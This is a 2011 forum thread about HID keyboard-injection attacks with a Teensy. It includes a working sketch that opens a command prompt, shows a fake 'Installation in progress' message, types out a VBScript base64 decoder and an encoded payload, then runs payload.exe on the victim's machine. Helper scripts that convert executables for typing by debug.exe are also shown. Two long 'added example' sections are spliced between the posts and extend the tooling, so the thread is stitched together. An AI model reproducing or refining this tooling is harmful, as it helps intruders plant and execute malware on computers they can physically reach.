Sud0x3 Posted February 10, 2011 (edited)

I bought a Teensy a few weeks back and here are some of my thoughts and ideas; I'm going to try not to ramble on.

IDEA 1: Build an executable on the victim PC

Here I basically wanted to try and find a way to create, make or build an executable from instructions sent from the device. The only way of doing this that I could think of was using the Windows debug trick. So, using a module from http://sqlmap.sourceforge.net/, I converted an executable into a format that Windows debug can read and convert back into an executable. So I had the lines of code; I needed to get them onto the PC. I decided I'd use the Teensy to write each line from the file into a new Notepad doc on the victim's PC, then save and do the conversion on the file.

dbgtool.py - Portable executable to ASCII debug script converter, Copyright (c) 2006-2010 sqlmap developers (source):

#!/usr/bin/env python
"""
$Id$

dbgtool.py - Portable executable to ASCII debug script converter

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

import os
import sys

from optparse import OptionError
from optparse import OptionParser


def convert(inputFile):
    # debug.exe works inside one 64 KB segment and the file image starts at
    # offset 0x100, so anything larger than 0xFF00 (65280) bytes cannot be written
    fileStat = os.stat(inputFile)
    fileSize = fileStat.st_size

    if fileSize > 65280:
        print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile)
        sys.exit(1)

    # 'n' names the output file, 'r cx' plus the next line sets CX (the number
    # of bytes 'w' writes), 'f' zero-fills the buffer so zero bytes can be skipped
    script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
    script += "%x\nf 0100 ffff 00\n" % fileSize
    scrString = ""
    counter = 256       # current offset in the debug segment (file data starts at 0x100)
    counter2 = 0        # non-zero bytes collected on the current 'e' line

    with open(inputFile, "rb") as fp:
        fileContent = fp.read()

    # iterating over bytes yields ints in Python 3, so struct.unpack is not needed
    for unsignedFileChar in fileContent:
        if unsignedFileChar != 0:
            counter2 += 1

            if not scrString:
                scrString = "e %0x %02x" % (counter, unsignedFileChar)
            else:
                scrString += " %02x" % unsignedFileChar
        elif scrString:
            script += "%s\n" % scrString
            scrString = ""
            counter2 = 0

        counter += 1

        # cap 'e' lines at 20 bytes so they stay short enough to type
        if counter2 == 20:
            script += "%s\n" % scrString
            scrString = ""
            counter2 = 0

    # bug fix: flush a trailing run of non-zero bytes shorter than 20 bytes,
    # otherwise the end of a file that does not end in zeros is silently dropped
    if scrString:
        script += "%s\n" % scrString

    script += "w\nq\n"

    return script


def main(inputFile, outputFile):
    if not os.path.isfile(inputFile):
        print("ERROR: the provided input file '%s' is not a regular file" % inputFile)
        sys.exit(1)

    script = convert(inputFile)

    if outputFile:
        with open(outputFile, "w") as fpOut:
            fpOut.write(script)
    else:
        print(script)


if __name__ == "__main__":
    usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
    parser = OptionParser(usage=usage, version="0.1")

    try:
        parser.add_option("-i", dest="inputFile", help="Input binary file")
        parser.add_option("-o", dest="outputFile", help="Output debug.exe text file")

        (args, _) = parser.parse_args()

        if not args.inputFile:
            parser.error("Missing the input file, -h for help")
    except (OptionError, TypeError) as e:
        parser.error(e)

    inputFile = args.inputFile
    outputFile = args.outputFile

    main(inputFile, outputFile)

I tried using the Keyboard.print command, Keyboard.print("n WirelessKeyView_exe");, and with help put together a script that would take the strings of a file and embed each one in a Keyboard.print string.

#!/usr/bin/env python
# wrap every line of the debug script in a keyboard call for the Teensy sketch.
# Keyboard.print() does not press Enter, and debug.exe reads one command per
# line, so the generated calls use Keyboard.println() to end each line
with open('debug.txt', 'r') as src, open('output.txt', 'a') as dst:
    for line in src:
        dst.write('Keyboard.println("' + line.rstrip('\n') + '");\n')

debug.txt (first lines):

r cx
bc00
f 0100 ffff 00
e 100 4d 5a 90
e 104 03
e 108 04
e 10c ff ff
e 110 b8
e 118 40
e 13c e0
e 140 0e 1f ba 0e
e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61
e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44
e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24
e 180 12 f2 d9 dc 56 93 b7 8f 56 93 b7 8f 56 93 b7 8f ac b0 f7 8f

output.txt (first lines):

Keyboard.println("r cx");
Keyboard.println("bc00");
Keyboard.println("f 0100 ffff 00");
Keyboard.println("e 100 4d 5a 90");
Keyboard.println("e 104 03");
Keyboard.println("e 108 04");
Keyboard.println("e 10c ff ff");
Keyboard.println("e 110 b8");
Keyboard.println("e 118 40");
Keyboard.println("e 13c e0");
Keyboard.println("e 140 0e 1f ba 0e");
Keyboard.println("e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61");
Keyboard.println("e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44");

After getting this far I tried to compile the project and it seems to be too many lines of code for the Teensy to handle in the software; I'll be honest, I don't have a clue. Here is the error I got when compiling:

elf section .data is not within region data
elf section .bss will not fit in region data
elf section .data is not within region data
./desktop/arduino-0018/hardware/tools/avr/bin/../lib/gcc/avr/4.3.2/../../../../avr/bin/ld.exe: region data overflowed by 43740 bytes

IDEA 2: Some ideas for scripts

Off the top of my head, not all may be viable or sane!

+ Enter BIOS: run through key combinations to put the PC into the BIOS configuration
+ Bypass screensaver: again, run through key combinations to bypass the screensaver
+ Enumeration: a script to do enumeration through the command line using only the PC's own programs. The Teensy would generate a batch file through the same methods discussed above, where I converted a file to a readable format for the Teensy to use.
+ Payload switcher on an LCD screen
+ More to come...

Edited February 10, 2011 by Sud0x3
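The post above converts a binary to a DEBUG.EXE script but never gets to run it on a target. The following is an added example, not part of the original post and not sqlmap code: it re-creates the dbgtool.py conversion in a few lines and then emulates the subset of DEBUG.EXE commands such a script uses (n, r cx, f, e, w, q), so the script can be checked offline, before anything is typed through a Teensy, by confirming that it rebuilds the original file byte for byte. Offsets follow DEBUG's convention (file data starts at CS:0100, 'w' writes CX bytes from there); the sample bytes, the payload_exe name and the MAX_SIZE constant are assumptions made here. One caveat worth knowing before investing in this route: DEBUG.EXE is a 16-bit program that ships only with 32-bit Windows, so the trick does not work at all on 64-bit installs.

```python
"""Build a DEBUG.EXE script for a file and verify it with a small emulator."""
import argparse

ORG = 0x100                     # DEBUG.EXE loads and writes file data from offset 0x100
MAX_SIZE = 0xFFFF - ORG + 1     # 65280 bytes fit in the segment above 0x100 (assumed limit)


def to_debug_script(data: bytes, name: str, width: int = 20) -> str:
    """Same output format as dbgtool.py: the buffer is zero-filled once with 'f',
    so only runs of non-zero bytes are written, as 'e' lines of up to `width` bytes."""
    if len(data) > MAX_SIZE:
        raise ValueError("file too big for debug.exe (max %d bytes)" % MAX_SIZE)
    lines = ["n %s" % name, "r cx", "%x" % len(data), "f 0100 ffff 00"]
    start, run = None, []
    for off, b in enumerate(data):
        if b:
            if start is None:
                start = ORG + off
            run.append(b)
        if run and (b == 0 or len(run) == width):
            lines.append("e %x %s" % (start, " ".join("%02x" % c for c in run)))
            start, run = None, []
    if run:  # trailing non-zero bytes that never hit a zero or the width limit
        lines.append("e %x %s" % (start, " ".join("%02x" % c for c in run)))
    lines += ["w", "q"]
    return "\n".join(lines) + "\n"


def run_debug_script(script: str) -> tuple:
    """Emulate DEBUG.EXE on the script: returns (file name, bytes 'w' would write).
    Only the commands dbgtool-style scripts use are implemented."""
    mem = bytearray(0x10000)        # one 64 KB segment, as DEBUG sees it
    regs = {"cx": 0, "bx": 0}       # 'w' writes BX:CX bytes; these scripts only set CX
    name, written = None, None
    lines = [ln.strip() for ln in script.splitlines()]
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line:
            continue
        cmd, *args = line.split()
        cmd = cmd.lower()
        if cmd == "n":                      # n <file>: name the output file
            name = args[0]
        elif cmd == "r":                    # r <reg>: DEBUG prompts, next line is the new value
            regs[args[0].lower()] = int(lines[i], 16)
            i += 1
        elif cmd == "f":                    # f <start> <end> <pattern...>: fill inclusive range
            start, end, *pattern = (int(a, 16) for a in args)
            for k in range(end - start + 1):
                mem[start + k] = pattern[k % len(pattern)]
        elif cmd == "e":                    # e <addr> <bytes...>: enter bytes at addr
            addr, *vals = (int(a, 16) for a in args)
            mem[addr:addr + len(vals)] = bytes(vals)
        elif cmd == "w":                    # w: write BX:CX bytes from 0x100 to the named file
            if name is None:
                raise ValueError("'w' before 'n': DEBUG would have no file name")
            size = (regs["bx"] << 16) | regs["cx"]
            written = bytes(mem[ORG:ORG + size])
        elif cmd == "q":
            break
        else:
            raise ValueError("unsupported DEBUG command: %r" % line)
    if written is None:
        raise ValueError("script never issued 'w', nothing would be written")
    return name, written


def round_trips(data: bytes, name: str = "payload_exe") -> bool:
    """True when emulating the generated script reproduces `data` exactly."""
    got_name, got = run_debug_script(to_debug_script(data, name))
    return got_name == name and got == data


# constructed sample (not a real binary): a fake DOS stub, zero padding and a
# few trailing bytes, which exercises zero-skipping, the 20-byte split and the flush
SAMPLE = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
          + b"\x00" * 48
          + b"This program cannot be run in DOS mode.\r\r\n$"
          + b"\x00" * 20 + b"\xde\xad\xbe\xef")

if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="build and verify a DEBUG.EXE script")
    ap.add_argument("file", nargs="?", help="binary to convert (default: built-in sample)")
    a = ap.parse_args()
    data = open(a.file, "rb").read() if a.file else SAMPLE
    print(to_debug_script(data, "payload_exe"), end="")
    print("round trip ok:", round_trips(data))
```

Running it without arguments prints the script for the built-in sample and the round-trip verdict; with a path it does the same for that file, which is the check to run before counting on a typed script to produce a working executable.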
illwill Posted February 13, 2011

I've been doing the same thing, using http://www.toolcrypt.org/tools/dbgtool/index.html instead of the Python script. I've been running into the same kind of issues: the code compiles OK, but I don't think the Teensy's memory can handle that much text at once. Trying to figure out a loop for it to take chunks of the debug script at a time.
DaberMania Posted April 8, 2011

I think I might have found the solution to help with getting an executable on the box using the Teensy and nothing but the HID drivers of the OS. When I was researching around I found a VBScript for server-side conversion of a file to base64. I then changed it around a bit and have adapted it to my Teensy. Right now I have posted a tutorial on how to convert any file to ASCII base64-encoded text and then decode it using nothing but VBScripts. I am currently in the process of writing the tutorial on adapting this logic to the Teensy. But to get you started, here is the tutorial on how to convert any file to ASCII base64 encoding: http://dabermania.blogspot.com/2011/03/converting-any-file-to-ascii-for.html
marked Posted May 26, 2011

Hi all, I was working on the same topic, so I can share my PoC. I used the same encoding technique that you are talking about (base64 in VBS), writing the payload and the VBS on the victim machine. Here is the code; it works fine for me with a 1 KB asm downloader (about 3 seconds to run the loop):

#include <phukdlib.h>
#include <avr/pgmspace.h>
//
// binary copy download and execute payload
//
// 25.05.2011

// VBScript decoder, written to script.vbs with a single echo. It reads the
// base64 text from argument 0, decodes it through MSXML's bin.base64 data
// type and writes the raw bytes to argument 1 with an ADODB.Stream
// (Type 1 = binary, SaveToFile option 2 = overwrite). Statements are joined
// with ':' so the whole script fits on one command line.
char vbsString[] = "echo Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject(\"Scripting.FileSystemObject\"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject(\"Microsoft.XMLDOM\"):Set EL = DM.createElement(\"tmp\"):EL.DataType = \"bin.base64\":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject(\"ADODB.Stream\"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub > script.vbs & cls";

// put the encoded exe payload here: one base64 chunk per line, kept in flash
// (PROGMEM) because the Teensy's SRAM is far too small for the whole payload.
// The first line uses '>' to create pl.dat, the others append with '>>'.
prog_char string_0[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > pl.dat & cls";
prog_char string_1[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_2[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_3[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_4[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_5[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_6[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5m >> pl.dat & cls";
prog_char string_7[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_8[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_9[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_10[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_11[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_12[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_13[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_14[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_15[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_16[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_17[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_18[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_19[] PROGMEM = "echo AA== >> pl.dat";

// Then set up a table to refer to your strings.
PROGMEM const char *string_table[] = {
  string_0, string_1, string_2, string_3, string_4, string_5, string_6,
  string_7, string_8, string_9, string_10, string_11, string_12, string_13,
  string_14, string_15, string_16, string_17, string_18, string_19
};

char buffer[100];   // SRAM copy of one line pulled out of flash; must hold the longest line

void setup() {
  delay(20000);                 // give the host time to enumerate the HID keyboard
  pinMode(11, OUTPUT);
  digitalWrite(11, HIGH);       // LED on: typing has started
  delay(50);
  sendWinKey();                 // Win+R
  delay(500);
  Keyboard.println("cmd");      // "cmd /t:ab"
  // delay(500);
  // ShrinkCurWinMSWIN();
  delay(500);
  Keyboard.print("msg ");
  sendAsterixKey();             // "msg *": message box for every session on the box
  Keyboard.println(" Installation in progress... - Please Wait ");
  delay(50);
  sendVbs();
}

void loop() {
}

void sendVbs() {
  Keyboard.println(vbsString);  // one line writes the whole decoder to script.vbs
  for (int i = 0; i < 20; i++) {
    // copy the i-th string out of flash into SRAM, then type it
    strcpy_P(buffer, (char*)pgm_read_word(&(string_table[i])));
    Keyboard.println(buffer);
    delay(50);
  }
  Keyboard.println("cscript script.vbs pl.dat payload.exe & cls");  // decode pl.dat to payload.exe
  Keyboard.println("payload.exe & cls");  // run payload
  Keyboard.println("exit");               // close the console
}

void sendPlusKey() {
  Keyboard.set_key1(KEYPAD_PLUS);
  Keyboard.send_now();
  Keyboard.set_key1(0);   // reset key state
  Keyboard.send_now();
}

void sendAsterixKey() {
  Keyboard.set_key1(KEYPAD_ASTERIX);
  Keyboard.send_now();
  Keyboard.set_key1(0);   // reset key state
  Keyboard.send_now();
}

void sendWinKey() {
  Keyboard.set_modifier(128);   // 0x80 is the right-GUI (Windows key) modifier bit
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

Any ideas are welcome. Cheers.
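The sketch above carries its twenty echo lines pasted in by hand, and the earlier posts in the thread stalled on exactly the step of cutting a payload into chunks the Teensy can hold. The following is an added example, not code from this thread or from the Teensy/PHUKD libraries: it base64-encodes any file, splits the text into fixed-width 'echo ... >> pl.dat' lines of the form used in the sketch, emits the matching Arduino declarations (string table, line count, buffer size), and replays what cmd.exe and the VBScript decoder do to those lines so the round trip can be checked offline before flashing. The file name pl.dat, the 72-character width and the trailing '& cls' are taken from the sketch; the flash figure is the 32 KB of a Teensy 2.0 (ATmega32U4) and is an assumption about which board is in use.

```python
"""Turn a file into PROGMEM echo lines for a Teensy keyboard sketch and verify them."""
import argparse
import base64
import re

PL_FILE = "pl.dat"
TEENSY2_FLASH = 32 * 1024     # assumption: Teensy 2.0; a Teensy++ 2.0 has 128 KB


def encode_chunks(data: bytes, width: int = 72) -> list:
    """Base64 text cut into `width`-character pieces. The base64 alphabet
    (A-Z a-z 0-9 + / =) needs no escaping for cmd.exe or a C string literal."""
    text = base64.b64encode(data).decode("ascii")
    return [text[i:i + width] for i in range(0, len(text), width)]


def echo_lines(chunks: list) -> list:
    """One cmd.exe command per chunk. The first uses '>' so a stale pl.dat is
    truncated rather than appended to; the rest use '>>'."""
    return ["echo %s %s %s & cls" % (c, ">" if i == 0 else ">>", PL_FILE)
            for i, c in enumerate(chunks)]


def simulate_cmd_echo(lines: list) -> str:
    """Contents of pl.dat after cmd.exe runs the lines: echo keeps the space
    before the redirection and appends CRLF, so every line ends in ' \\r\\n'."""
    out = ""
    for line in lines:
        m = re.match(r"echo (\S+) (>>?) " + re.escape(PL_FILE), line)
        if not m:
            raise ValueError("not an echo line: %r" % line)
        if m.group(2) == ">":
            out = ""
        out += m.group(1) + " \r\n"
    return out


def decode_pl_dat(text: str) -> bytes:
    """What the VBScript's MSXML bin.base64 element yields: whitespace (the
    trailing spaces and CRLFs) is ignored, then the text is decoded."""
    return base64.b64decode("".join(text.split()))


def sketch_fragment(lines: list, prefix: str = "string") -> str:
    """Arduino C declarations: one flash-resident string per line, the pointer
    table the sketch's loop indexes with pgm_read_word(), a LINE_COUNT for that
    loop, and a buffer sized to the longest line plus its terminator.
    'const char ... PROGMEM' replaces the deprecated prog_char typedef."""
    decls = ['const char %s_%d[] PROGMEM = "%s";' % (prefix, i, l)
             for i, l in enumerate(lines)]
    table = "PROGMEM const char *const %s_table[] = {%s};" % (
        prefix, ", ".join("%s_%d" % (prefix, i) for i in range(len(lines))))
    longest = max(len(l) for l in lines)
    return "\n".join(decls + [table,
                              "#define LINE_COUNT %d" % len(lines),
                              "char buffer[%d];" % (longest + 1)]) + "\n"


def flash_bytes(lines: list) -> int:
    """Flash the table costs: each line plus its NUL, plus a 2-byte pointer per entry."""
    return sum(len(l) + 1 + 2 for l in lines)


def build(data: bytes, width: int = 72) -> dict:
    """Everything a sketch needs for `data`, plus the offline round-trip verdict."""
    lines = echo_lines(encode_chunks(data, width))
    ok = decode_pl_dat(simulate_cmd_echo(lines)) == data
    return {"lines": lines, "sketch": sketch_fragment(lines),
            "flash": flash_bytes(lines), "round_trip_ok": ok}


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="emit PROGMEM echo lines for a file")
    ap.add_argument("file", help="binary to embed")
    ap.add_argument("--width", type=int, default=72, help="base64 characters per line")
    a = ap.parse_args()
    result = build(open(a.file, "rb").read(), a.width)
    print(result["sketch"])
    print("// %d lines, ~%d bytes of flash for the table (board has %d), round trip %s"
          % (len(result["lines"]), result["flash"], TEENSY2_FLASH,
             "ok" if result["round_trip_ok"] else "FAILED"))
```

Paste the printed fragment in place of the hand-written string_N block and replace the loop's hard-coded 20 with LINE_COUNT; the flash figure tells you at a glance whether the payload, at 4/3 of its size after base64, still fits next to the sketch, which is the limit the earlier posts hit.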